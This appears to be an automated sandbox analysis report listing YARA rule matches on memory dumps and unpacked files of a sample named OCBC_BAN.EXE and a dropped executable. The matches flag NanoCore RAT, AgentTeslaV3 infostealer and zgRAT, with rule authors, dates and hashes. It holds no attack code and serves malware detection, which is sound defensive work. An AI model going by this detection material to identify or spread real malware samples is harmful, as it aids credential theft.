          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 12.2.OCBC_BAN.EXE.5300000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.2.OCBC_BAN.EXE.5300000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.3.OCBC_BAN.EXE.a803e58.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 0.3.OCBC_BAN.EXE.a7b3e38.0.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 0.3.OCBC_BAN.EXE.a803e58.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.3.OCBC_BAN.EXE.985c050.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
          Source: 0.3.OCBC_BAN.EXE.985c050.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, type: DROPPEDMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: Pubrtkzyqpdcef1.exe.0.dr, u003cPrivateImplementationDetailsu003eu007b709DF250u002dC716u002d4F4Eu002dB078u002dD4183B01CCB2u007d/u0039DE03333u002d9F21u002d4AC9u002d9E4Eu002dA76868BFFFA5.csLarge array initialization: .cctor: array initializer size 11638
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, u003cPrivateImplementationDetailsu003eu007b709DF250u002dC716u002d4F4Eu002dB078u002dD4183B01CCB2u007d/u0039DE03333u002d9F21u002d4AC9u002d9E4Eu002dA76868BFFFA5.csLarge array initialization: .cctor: array initializer size 11638
          Source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, u003cPrivateImplementationDetailsu003eu007b709DF250u002dC716u002d4F4Eu002dB078u002dD4183B01CCB2u007d/u0039DE03333u002d9F21u002d4AC9u002d9E4Eu002dA76868BFFFA5.csLarge array initialization: .cctor: array initializer size 11638
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack, u003cPrivateImplementationDetailsu003eu007b709DF250u002dC716u002d4F4Eu002dB078u002dD4183B01CCB2u007d/u0039DE03333u002d9F21u002d4AC9u002d9E4Eu002dA76868BFFFA5.csLarge array initialization: .cctor: array initializer size 11638
          Source: OCBC_BAN.EXEStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0.3.OCBC_BAN.EXE.a7b3e38.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 12.2.OCBC_BAN.EXE.5300000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.2.OCBC_BAN.EXE.5300000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.2.OCBC_BAN.EXE.5300000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.3.OCBC_BAN.EXE.a803e58.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
